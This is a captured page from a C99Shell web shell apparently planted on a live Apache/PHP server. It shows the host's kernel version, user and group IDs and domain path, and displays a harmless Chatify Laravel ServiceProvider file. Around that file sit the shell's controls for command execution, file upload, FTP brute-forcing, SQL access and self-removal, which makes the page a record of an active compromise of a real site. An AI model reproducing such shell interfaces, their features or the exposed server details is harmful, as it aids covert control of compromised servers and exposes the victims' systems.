!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/munafio/chatify/src/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ChatifyServiceProvider.php (2.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Chatify;

use 
Chatify\Console\InstallChatify;
use 
Illuminate\Support\Facades\Route;
use 
Illuminate\Support\ServiceProvider;

class 
ChatifyServiceProvider extends ServiceProvider
{
    
/**
     * Register services.
     *
     * @return void
     */
    
public function register()
    {
        
app()->bind('ChatifyMessenger', function () {
            return new 
\Chatify\ChatifyMessenger;
        });
    }

    
/**
     * Bootstrap services.
     *
     * @return void
     */
    
public function boot()
    {
        
// Load Views, Migrations and Routes
        
$this->loadViewsFrom(__DIR__ '/views''Chatify');
        
$this->loadMigrationsFrom(__DIR__ '/database/migrations');
        
$this->loadRoutes();

        if (
$this->app->runningInConsole()) {
            
$this->commands([
                
InstallChatify::class,
            ]);
            
$this->setPublishes();
        }

    }

    
/**
     * Publishing the files that the user may override.
     *
     * @return void
     */
    
protected function setPublishes()
    {
            
// Config
            
$this->publishes([
                
__DIR__ '/config/chatify.php' => config_path('chatify.php')
            ], 
'chatify-config');

            
// Migrations
            
$this->publishes([
                
__DIR__ '/database/migrations/' => database_path('migrations')
            ], 
'chatify-migrations');

            
// Models
            
$isV8 explode('.',app()->version())[0] >= 8;
            
$this->publishes([
                
__DIR__ '/Models' => app_path($isV8 'Models' '')
            ], 
'chatify-models');

            
// Controllers
            
$this->publishes([
                
__DIR__ '/Http/Controllers' => app_path('Http/Controllers/vendor/Chatify')
            ], 
'chatify-controllers');

            
// Views
            
$this->publishes([
                
__DIR__ '/views' => resource_path('views/vendor/Chatify')
            ], 
'chatify-views');

            
// Assets
            
$this->publishes([
                
// CSS
                
__DIR__ '/assets/css' => public_path('css/chatify'),
                
// JavaScript
                
__DIR__ '/assets/js' => public_path('js/chatify'),
                
// Images
                
__DIR__ '/assets/imgs' => storage_path('app/public/' config('chatify.user_avatar.folder')),
            ], 
'chatify-resources');
    }

    
/**
     * Group the routes and set up configurations to load them.
     *
     * @return void
     */
    
protected function loadRoutes()
    {
        
Route::group($this->routesConfigurations(), function () {
            
$this->loadRoutesFrom(__DIR__ '/routes/web.php');
        });
    }

    
/**
     * Routes configurations.
     *
     * @return array
     */
    
private function routesConfigurations()
    {
        return [
            
'prefix' => config('chatify.routes.prefix'),
            
'namespace' =>  config('chatify.routes.namespace'),
            
'middleware' => config('chatify.routes.middleware'),
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--